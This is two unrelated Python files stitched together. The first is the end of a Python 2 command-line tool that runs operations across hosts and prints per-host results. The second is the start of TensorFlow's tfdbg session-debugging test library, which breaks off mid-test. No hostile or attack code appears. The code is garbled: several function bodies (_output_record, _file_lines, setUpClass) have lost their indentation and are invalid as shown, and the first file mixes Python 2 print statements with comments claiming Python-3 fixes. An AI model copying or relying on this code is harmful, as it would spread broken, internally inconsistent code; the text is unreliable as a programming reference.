    table (--table-output). Adds the per-host failure counts to
    options.errors.
    """
    data = {}
    pool = options.pool_class(options.pool_size)
    jobs = [(options, _host) for _host in options.hosts]
    for host, result, errors in pool.imap_unordered(_do_au_operation_job, jobs):
        data.update(result)
        options.errors = options.errors + errors
    if options.text_output:
        for host in sorted(options.hosts):
            # BUG FIX: the stored column key is the 1-tuple (host,), not the
            # bare host string, so the comparison must be against (host,);
            # the old `k[1] == host` never matched and text output was empty.
            # (.items() also replaces the Python-2-only .iteritems().)
            hostresults = [(k[0], v) for k, v in data.items()
                           if k[1] == (host,)]
            if options.verbose:
                successful = [x for x in hostresults if x[1] is None]
                if successful:
                    _output_record(options, ['Successful on %s:' % (host,)])
                    for x in sorted(successful, key=options.keysort):
                        _output_record(options, options.keydisplay(x[0]))
                    _output_record(options, [])
            unsuccessful = [x for x in hostresults if x[1] is not None]
            if unsuccessful:
                _output_record(options, ['Unsuccessful on %s:' % (host,)])
                for x in sorted(unsuccessful, key=options.keysort):
                    _output_record(options, options.keydisplay(x[0]) + (x[1],))
                _output_record(options, [])
    else:
        display = dict([((options.keydisplay(k[0]), k[1]), v)
                        for k, v in data.items()])
        _output_table(options, display, options.keydisplay(None),
                      [options.hosts])
# Last modified 2015-08-05
def _output_record(options, lst):
'''Internal method to display a single record.'''
print '\t'.join([str(x or '') for x in lst])
# Last modified 2016-05-16
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
    '''Internal method to display tabular output. (Should be refactored.)

    :param data: dict mapping (rowkey, colkey) -> cell value.
    :param rowheaders: header labels for the row-key columns.
    :param lstcolkeys: list of column-key component lists; the actual column
        keys are their Cartesian product.
    :param rowsort: optional sort key applied to the row keys.
    '''
    colkeys = list(itertools.product(*lstcolkeys))
    # One header row per column-key component; only the last header row
    # carries the row headers, the earlier ones are padded with blanks.
    # (range replaces the Python-2-only xrange.)
    for j in range(len(lstcolkeys)):
        if j < len(lstcolkeys) - 1:
            rowpart = [''] * len(rowheaders)
        else:
            rowpart = rowheaders
        _output_record(options, rowpart + [x[j] for x in colkeys])
    # One data row per distinct row key, cells looked up per column key
    # (missing cells render as None -> empty field).
    for rowkey in sorted(set(k[0] for k in data), key=rowsort):
        _output_record(options,
                       list(rowkey) + [data.get((rowkey, colkey))
                                       for colkey in colkeys])
# Last modified 2015-08-31
def _file_lines(fstr):
with open(os.path.expanduser(fstr)) as f: ret = filter(lambda y: len(y) > 0, [x.partition('#')[0].strip() for x in f])
if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
return ret
def _main():
    '''Main method.'''
    # Parse the command line into a validated options object.
    parser = _ContentConfigurationServiceOptions.make_parser()
    (opts, args) = parser.parse_args()
    options = _ContentConfigurationServiceOptions(parser, opts, args)
    # Run the work in a daemon thread and poll it with short joins so the
    # main thread stays responsive (e.g. to KeyboardInterrupt).
    worker = Thread(target=_do_au_operation, args=(options,))
    worker.daemon = True
    worker.start()
    while worker.is_alive():
        worker.join(1.5)
    # Report the accumulated error count via the exit status.
    if options.errors > 0:
        noun = 'error' if options.errors == 1 else 'errors'
        sys.exit('%d %s; exiting' % (options.errors, noun))
# Main entry point
# Main entry point: run only when executed as a script, not on import.
if __name__ == '__main__':
    _main()
|
session_debug_testlib.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
def no_rewrite_session_config():
  """Build a ConfigProto with grappler graph rewrites disabled.

  Model pruning and the arithmetic/dependency optimizers are switched off —
  presumably so debug-watched nodes are not rewritten out of the graph
  before tfdbg can observe them.
  """
  rewrites = rewriter_config_pb2.RewriterConfig(
      disable_model_pruning=True,
      arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF,
      dependency_optimization=rewriter_config_pb2.RewriterConfig.OFF)
  graph_opts = config_pb2.GraphOptions(rewrite_options=rewrites)
  return config_pb2.ConfigProto(graph_options=graph_opts)
class _RNNCellForTest(rnn_cell_impl.RNNCell):
  """RNN cell for testing.

  Minimal cell: output = w * input, where w is a trainable scalar Variable;
  the state is passed through unchanged.
  """

  def __init__(self, input_output_size, state_size):
    # NOTE(review): super().__init__ is not called here; apparently
    # sufficient for these tests -- confirm against rnn_cell_impl.RNNCell.
    self._input_output_size = input_output_size
    self._state_size = state_size
    self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")

  @property
  def output_size(self):
    """Output size (same as the configured input size)."""
    return self._input_output_size

  @property
  def state_size(self):
    """State size of the cell."""
    return self._state_size

  def __call__(self, input_, state, scope=None):
    # Scale the input by the trainable weight; state passes through.
    return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/device:CPU:0"
  @classmethod
  def tearDownClass(cls):
    # No class-level state to clean up; present for symmetry with setUpClass.
    pass
  def setUp(self):
    # Fresh temporary directory per test case to receive the debug dumps.
    self._dump_root = tempfile.mkdtemp()
  def tearDown(self):
    """Reset the default graph and remove this test's dump directory."""
    ops.reset_default_graph()
    # Tear down temporary dump directory.
    if os.path.isdir(self._dump_root):
      shutil.rmtree(self._dump_root)
  def _debug_urls(self, run_number=None):
    """Return the debug URL(s) to dump to; subclasses must implement this."""
    raise NotImplementedError(
        "_debug_urls() method is not implemented in the base test class.")
  def _debug_dump_dir(self, run_number=None):
    """Return the dump directory for a run; subclasses must implement this."""
    raise NotImplementedError(
        "_debug_dump_dir() method is not implemented in the base test class.")
  def _debug_run_and_get_dump(self,
                              sess,
                              fetches,
                              feed_dict=None,
                              debug_ops="DebugIdentity",
                              tolerate_debug_op_creation_failures=False,
                              global_step=-1,
                              validate=True,
                              expected_partition_graph_count=None):
    """Run fetches with debugging and obtain DebugDumpDir.

    Args:
      sess: the tf.Session to be used.
      fetches: fetches of the Session.run().
      feed_dict: feed dict for the Session.run().
      debug_ops: name(s) of the debug ops to be used.
      tolerate_debug_op_creation_failures: whether to tolerate debug op
        creation failures.
      global_step: Optional global step.
      validate: whether to validate dumped tensors against graph.
      expected_partition_graph_count: optional count of partition graphs to
        assert on.

    Returns:
      1. Return values of the Session.run().
      2. The DebugDumpDir object from the debugged run().
    """
    # Watch the entire graph, dumping to the URL(s) provided by the subclass.
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=debug_ops,
        debug_urls=self._debug_urls(),
        tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
        global_step=global_step)
    run_metadata = config_pb2.RunMetadata()
    run_output = sess.run(fetches,
                          feed_dict=feed_dict,
                          options=run_options,
                          run_metadata=run_metadata)
    if expected_partition_graph_count is not None:
      self.assertEqual(expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
    # Load the on-disk dump, optionally validating it against the
    # partition graphs captured in run_metadata.
    return run_output, debug_data.DebugDumpDir(
        self._dump_root, partition_graphs=run_metadata.partition_graphs,
        validate=validate)
  def _generate_dump_from_simple_addition_graph(self):
    """Run w = matmul(u, v) with debug watches and return values plus dump.

    Returns:
      A SimpleAddResults namedtuple bundling the initializer values, the
      u/v/w tensors and names, and the loaded DebugDumpDir.
    """
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
      v_init_val = np.array([[2.0], [-1.0]])
      # Use node names with overlapping namespace (i.e., parent directory) to
      # test concurrent, non-racing directory creation.
      u_name = "u"
      v_name = "v"
      w_name = "w"
      u_init = constant_op.constant(u_init_val, shape=[2, 2])
      u = variables.Variable(u_init, name=u_name)
      v_init = constant_op.constant(v_init_val, shape=[2, 1])
      v = variables.Variable(v_init, name=v_name)
      w = math_ops.matmul(u, v, name=w_name)
      u.initializer.run()
      v.initializer.run()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = "file://%s" % self._dump_root
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      # Invoke Session.run().
      sess.run(w, options=run_options, run_metadata=run_metadata)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      simple_add_results = collections.namedtuple("SimpleAddResults", [
          "u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
          "dump"
      ])
      return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
                                w_name, dump)
  def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
    """Injected __copy_* nodes carry per-debug-op spec attributes."""
    with session.Session() as sess:
      u = variables.Variable(2.1, name="u")
      v = variables.Variable(20.0, name="v")
      w = math_ops.multiply(u, v, name="w")
      sess.run(variables.global_variables_initializer())
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # u gets two debug ops (one gated for gRPC streaming); v gets one.
      debug_utils.add_debug_tensor_watch(
          run_options,
          "u",
          0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
          debug_urls=debug_urls)
      debug_utils.add_debug_tensor_watch(
          run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      r = sess.run(w, options=run_options, run_metadata=run_metadata)
      self.assertAllClose(42.0, r)
      # Locate the copy nodes the debugger inserted for u and v.
      u_copy_node_def = None
      v_copy_node_def = None
      for partition_graph in run_metadata.partition_graphs:
        for node_def in partition_graph.node:
          if debug_graphs.is_copy_node(node_def.name):
            if node_def.name == "__copy_u_0":
              u_copy_node_def = node_def
            elif node_def.name == "__copy_v_0":
              v_copy_node_def = node_def
      # Each spec string is "<debug_op>;<debug_url>;<gated_grpc as 0/1>".
      self.assertIsNotNone(u_copy_node_def)
      debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
      self.assertEqual(2, len(debug_ops_spec))
      self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
                       debug_ops_spec[0].decode("utf-8"))
      self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
                       debug_ops_spec[1].decode("utf-8"))
      self.assertIsNotNone(v_copy_node_def)
      debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
      self.assertEqual(1, len(debug_ops_spec))
      self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
                       debug_ops_spec[0].decode("utf-8"))
  def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
    """Dumps under overlapping node namespaces load with correct metadata."""
    results = self._generate_dump_from_simple_addition_graph()
    self.assertTrue(results.dump.loaded_partition_graphs())
    # Since global_step is not explicitly specified, it should take its default
    # value: -1.
    self.assertEqual(-1, results.dump.core_metadata.global_step)
    self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
    self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
    self.assertEqual([], results.dump.core_metadata.input_names)
    self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
    self.assertEqual([], results.dump.core_metadata.target_nodes)
    # Verify the dumped tensor values for u and v.
    self.assertEqual(2, results.dump.size)
    self.assertAllClose([results.u_init_val],
                        results.dump.get_tensors("%s/read" % results.u_name, 0,
                                                 "DebugIdentity"))
    self.assertAllClose([results.v_init_val],
                        results.dump.get_tensors("%s/read" % results.v_name, 0,
                                                 "DebugIdentity"))
    # Relative timestamps are non-negative; dump files are non-empty.
    self.assertGreaterEqual(
        results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
                                        "DebugIdentity")[0], 0)
    self.assertGreaterEqual(
        results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
                                        "DebugIdentity")[0], 0)
    self.assertGreater(
        results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
                                          "DebugIdentity")[0], 0)
    self.assertGreater(
        results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
                                          "DebugIdentity")[0], 0)
  def testGetOpTypeWorks(self):
    """node_op_type() returns op types and raises for unknown node names."""
    results = self._generate_dump_from_simple_addition_graph()
    self.assertEqual(results.u.op.type,
                     results.dump.node_op_type(results.u_name))
    self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
    self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      results.dump.node_op_type("foo_bar")
  def testDumpStringTensorsWorks(self):
    """String tensors can be dumped and read back from the debug dump."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      str1_init_val = np.array(b"abc")
      str2_init_val = np.array(b"def")
      str1_init = constant_op.constant(str1_init_val)
      str2_init = constant_op.constant(str2_init_val)
      str1_name = "str1"
      str2_name = "str2"
      str1 = variables.Variable(str1_init, name=str1_name)
      str2 = variables.Variable(str2_init, name=str2_name)
      # Concatenate str1 and str2
      str_concat = math_ops.add(str1, str2, name="str_concat")
      str1.initializer.run()
      str2.initializer.run()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      sess.run(str_concat, options=run_options, run_metadata=run_metadata)
      # String ops are located on CPU.
      self.assertEqual(1, len(run_metadata.partition_graphs))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      self.assertIn(str1_name, dump.nodes())
      self.assertIn(str2_name, dump.nodes())
      self.assertEqual(2, dump.size)
      # Verify the dumped string values round-trip intact.
      self.assertEqual([str1_init_val],
                       dump.get_tensors("%s/read" % str1_name, 0,
                                        "DebugIdentity"))
      self.assertEqual([str2_init_val],
                       dump.get_tensors("%s/read" % str2_name, 0,
                                        "DebugIdentity"))
      # Timestamps are non-negative and the dump files are non-empty.
      self.assertGreaterEqual(
          dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
          0)
      self.assertGreaterEqual(
          dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
          0)
      self.assertGreater(
          dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
                                    "DebugIdentity")[0], 0)
      self.assertGreater(
          dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
                                    "DebugIdentity")[0], 0)
  def testDumpUninitializedVariable(self):
    """Watching uninitialized variables yields inconvertible tensor protos."""
    op_namespace = "testDumpUninitializedVariable"
    with session.Session() as sess:
      u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
      s_init_val = b"str1"
      u_name = "%s/u" % op_namespace
      s_name = "%s/s" % op_namespace
      u_init = constant_op.constant(u_init_val, shape=[2, 2])
      u = variables.Variable(u_init, name=u_name)
      s_init = constant_op.constant(s_init_val)
      s = variables.Variable(s_init, name=s_name)
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, u_name, 0, debug_urls=debug_urls)
      debug_utils.add_debug_tensor_watch(
          run_options, s_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      # Initialize u and s.
      sess.run(variables.global_variables_initializer(),
               options=run_options,
               run_metadata=run_metadata)
      # Verify the dump file for the uninitialized value of u.
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      self.assertEqual(2, dump.size)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      # The values watched during initialization are the *pre*-initialization
      # ones, so they come back as uninitialized InconvertibleTensorProtos.
      u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
      s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
      self.assertEqual(1, len(u_vals))
      self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
      self.assertFalse(u_vals[0].initialized)
      self.assertEqual(1, len(s_vals))
      self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
      self.assertFalse(s_vals[0].initialized)
      # Call run() again, to check that u is initialized properly.
      self.assertAllClose(u_init_val, sess.run(u))
      self.assertEqual(s_init_val, sess.run(s))
  def testDebugWhileLoopGeneratesMultipleDumps(self):
    """Each while-loop iteration of a watched tensor produces its own dump."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      num_iter = 10
      # "u" is the Variable being updated in the loop.
      u_name = "testDumpToFileWhileLoop/u"
      u_namespace = u_name.split("/")[0]
      u_init_val = np.array(11.0)
      u_init = constant_op.constant(u_init_val)
      u = variables.Variable(u_init, name=u_name)
      # "v" is the increment.
      v_name = "testDumpToFileWhileLoop/v"
      v_namespace = v_name.split("/")[0]
      v_init_val = np.array(2.0)
      v_init = constant_op.constant(v_init_val)
      v = variables.Variable(v_init, name=v_name)
      u.initializer.run()
      v.initializer.run()
      i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")

      def cond(i):
        # Loop while the counter is below num_iter.
        return math_ops.less(i, num_iter)

      def body(i):
        # Each iteration adds v into u, then increments the counter; the
        # with_dependencies ensures the assign happens before i advances.
        new_u = state_ops.assign_add(u, v)
        new_i = math_ops.add(i, 1)
        op = control_flow_ops.group(new_u)
        new_i = control_flow_ops.with_dependencies([op], new_i)
        return [new_i]

      loop = control_flow_ops.while_loop(
          cond, body, [i], parallel_iterations=10)
      # Create RunOptions for debug-watching tensors
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, u_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for while/Identity.
      debug_utils.add_debug_tensor_watch(
          run_options, "while/Identity", 0, debug_urls=debug_urls)
      # Add debug tensor watch for while/Add/y.
      debug_utils.add_debug_tensor_watch(
          run_options, "while/Add/y", 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      r = sess.run(loop, options=run_options, run_metadata=run_metadata)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      self.assertEqual(num_iter, r)
      u_val_final = sess.run(u)
      self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
      # Verify dump files
      self.assertTrue(os.path.isdir(self._dump_root))
      u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
      v_glob_out = glob.glob(os.path.join(
          self._dump_root, "*", v_namespace, "v"))
      self.assertTrue(os.path.isdir(u_glob_out[0]))
      self.assertTrue(os.path.isdir(v_glob_out[0]))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      # Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
      # and 10 iterations of while/Add/y.
      self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
      # Verify tensor values.
      self.assertAllClose([u_init_val],
                          dump.get_tensors(u_name, 0, "DebugIdentity"))
      self.assertAllClose([v_init_val],
                          dump.get_tensors("%s/read" % v_name, 0,
                                           "DebugIdentity"))
      while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
      self.assertEqual(10, len(while_id_tensors))
      for k in xrange(len(while_id_tensors)):
        self.assertAllClose(np.array(k), while_id_tensors[k])
      # Verify ascending timestamps from the while loops.
      while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
                                                        "DebugIdentity")
      while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
                                                            "DebugIdentity")
      self.assertEqual(10, len(while_id_rel_timestamps))
      prev_rel_time = 0
      prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
      for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
                                           while_id_dump_sizes_bytes):
        self.assertGreaterEqual(rel_time, prev_rel_time)
        self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
        prev_rel_time = rel_time
        prev_dump_size_bytes = dump_size_bytes
      # Test querying debug watch keys from node name.
      watch_keys = dump.debug_watch_keys("while/Identity")
      self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
      # Test querying debug datum instances from debug watch key.
      self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
      self.assertEqual([], dump.watch_key_to_data("foo"))
  def testDebugWhileLoopWatchingWholeGraphWorks(self):
    """Whole-graph watching captures per-iteration while-loop tensors."""
    with session.Session() as sess:
      loop_body = lambda i: math_ops.add(i, 2)
      loop_cond = lambda i: math_ops.less(i, 16)
      i = constant_op.constant(10, name="i")
      loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
      loop_result, dump = self._debug_run_and_get_dump(sess, loop)
      self.assertEqual(16, loop_result)
      # Enter sees the initial value; NextIteration sees each updated value.
      self.assertEqual(
          [[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
      self.assertEqual(
          [[12], [14], [16]],
          dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
  def testDebugTrainingDynamicRNNWorks(self):
    """A dynamic_rnn training step can be debugged with node blacklists."""
    with session.Session() as sess:
      input_size = 3
      state_size = 2
      time_steps = 4
      batch_size = 2
      input_values = np.random.randn(time_steps, batch_size, input_size)
      sequence_length = np.random.randint(0, time_steps, size=batch_size)
      concat_inputs = array_ops.placeholder(
          dtypes.float32, shape=(time_steps, batch_size, input_size))
      outputs_dynamic, _ = rnn.dynamic_rnn(
          _RNNCellForTest(input_size, state_size),
          inputs=concat_inputs,
          sequence_length=sequence_length,
          time_major=True,
          dtype=dtypes.float32)
      toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
      train_op = gradient_descent.GradientDescentOptimizer(
          learning_rate=0.1).minimize(toy_loss, name="train_op")
      sess.run(variables.global_variables_initializer())
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph_with_blacklists(
          run_options,
          sess.graph,
          node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
          debug_urls=self._debug_urls())
      # b/36870549: Nodes with these name patterns need to be excluded from
      # tfdbg in order to prevent MSAN warnings of uninitialized Tensors
      # under both file:// and grpc:// debug URL schemes.
      run_metadata = config_pb2.RunMetadata()
      sess.run(train_op, feed_dict={concat_inputs: input_values},
               options=run_options, run_metadata=run_metadata)
      # Loading the dump validates it against the partition graphs.
      debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
  def testDebugCondWatchingWholeGraphWorks(self):
    """Conditional (tf.cond) graphs can be debug-watched whole."""
    with session.Session() as sess:
      x = variables.Variable(10.0, name="x")
      y = variables.Variable(20.0, name="y")
      # x > y is False here, so the y + 1 branch is taken.
      cond = control_flow_ops.cond(
          x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
      sess.run(variables.global_variables_initializer())
      cond_result, dump = self._debug_run_and_get_dump(sess, cond)
      self.assertEqual(21, cond_result)
      self.assertAllClose(
          [21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
  def testFindNodesWithBadTensorValues(self):
    """dump.find() locates tensors containing inf/nan values."""
    with session.Session() as sess:
      u_name = "testFindNodesWithBadTensorValues/u"
      v_name = "testFindNodesWithBadTensorValues/v"
      w_name = "testFindNodesWithBadTensorValues/w"
      x_name = "testFindNodesWithBadTensorValues/x"
      y_name = "testFindNodesWithBadTensorValues/y"
      z_name = "testFindNodesWithBadTensorValues/z"
      u_init = constant_op.constant([2.0, 4.0])
      u = variables.Variable(u_init, name=u_name)
      v_init = constant_op.constant([2.0, 1.0])
      v = variables.Variable(v_init, name=v_name)
      # Expected output: [0.0, 3.0]
      w = math_ops.subtract(u, v, name=w_name)
      # Expected output: [inf, 1.3333]
      x = math_ops.div(u, w, name=x_name)
      # Expected output: [nan, 4.0]
      y = math_ops.multiply(w, x, name=y_name)
      z = math_ops.multiply(y, y, name=z_name)
      u.initializer.run()
      v.initializer.run()
      _, dump = self._debug_run_and_get_dump(
          sess, z,
          expected_partition_graph_count=self._expected_partition_graph_count)

      def has_bad_value(_, tensor):
        # Predicate for dump.find(): any nan or inf element counts as bad.
        return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))

      # Find all "offending tensors".
      bad_data = dump.find(has_bad_value)
      # Verify that the nodes with bad values are caught through running find
      # on the debug dump.
      self.assertEqual(3, len(bad_data))
      self.assertEqual(x_name, bad_data[0].node_name)
      self.assertEqual(y_name, bad_data[1].node_name)
      self.assertEqual(z_name, bad_data[2].node_name)
      # Test first_n kwarg of find(): Find the first offending tensor.
      first_bad_datum = dump.find(has_bad_value, first_n=1)
      self.assertEqual(1, len(first_bad_datum))
      self.assertEqual(x_name, first_bad_datum[0].node_name)
  def _session_run_for_graph_structure_lookup(self):
    """Run a small u -> v -> w chain and return the names plus the dump.

    Returns:
      A (u_name, v_name, w_name, dump) tuple used by the graph-structure
      lookup tests below.
    """
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_name = "testDumpGraphStructureLookup/u"
      v_name = "testDumpGraphStructureLookup/v"
      w_name = "testDumpGraphStructureLookup/w"
      u_init = constant_op.constant([2.0, 4.0])
      u = variables.Variable(u_init, name=u_name)
      v = math_ops.add(u, u, name=v_name)
      w = math_ops.add(v, v, name=w_name)
      u.initializer.run()
      _, dump = self._debug_run_and_get_dump(
          sess, w,
          expected_partition_graph_count=self._expected_partition_graph_count)
    return u_name, v_name, w_name, dump
  def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
    """Device listing, node-to-device mapping, and node existence queries."""
    u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
    # Test num_devices().
    self.assertEqual(self._expected_num_devices, len(dump.devices()))
    # Test node_device().
    self.assertEqual(self._main_device, dump.node_device(u_name))
    with self.assertRaisesRegexp(ValueError,
                                 "does not exist in partition graphs"):
      dump.node_device(u_name + "foo")
    # Test node_exists().
    self.assertTrue(dump.node_exists(u_name))
    self.assertTrue(dump.node_exists(u_name + "/read"))
    self.assertFalse(dump.node_exists(u_name + "/read" + "/foo"))
  def testGraphStructureLookupGivesNodesAndAttributes(self):
    """Node-name listing and node attribute queries on the dump."""
    u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
    u_read_name = u_name + "/read"
    # Test node name list lookup of the DebugDumpDir object.
    if test_util.gpu_device_name():
      node_names = dump.nodes(
          device_name="/job:localhost/replica:0/task:0/device:GPU:0")
    else:
      node_names = dump.nodes()
    self.assertTrue(u_name in node_names)
    self.assertTrue(u_read_name in node_names)
    # Test querying node attributes.
    u_attr = dump.node_attributes(u_name)
    self.assertEqual(dtypes.float32, u_attr["dtype"].type)
    self.assertEqual(1, len(u_attr["shape"].shape.dim))
    self.assertEqual(2, u_attr["shape"].shape.dim[0].size)
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      dump.node_attributes("foo")
  def testGraphStructureLookupGivesDebugWatchKeys(self):
    """Watch-key queries by node name, and data lookup by watch key."""
    u_name, v_name, w_name, dump = (
        self._session_run_for_graph_structure_lookup())
    # Test querying the debug watch keys with node names.
    self.assertEqual(["%s:0:DebugIdentity" % u_name],
                     dump.debug_watch_keys(u_name))
    self.assertEqual(["%s:0:DebugIdentity" % v_name],
                     dump.debug_watch_keys(v_name))
    self.assertEqual(["%s:0:DebugIdentity" % w_name],
                     dump.debug_watch_keys(w_name))
    self.assertEqual([], dump.debug_watch_keys("foo"))
    # Test querying debug datum instances from debug watch.
    u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
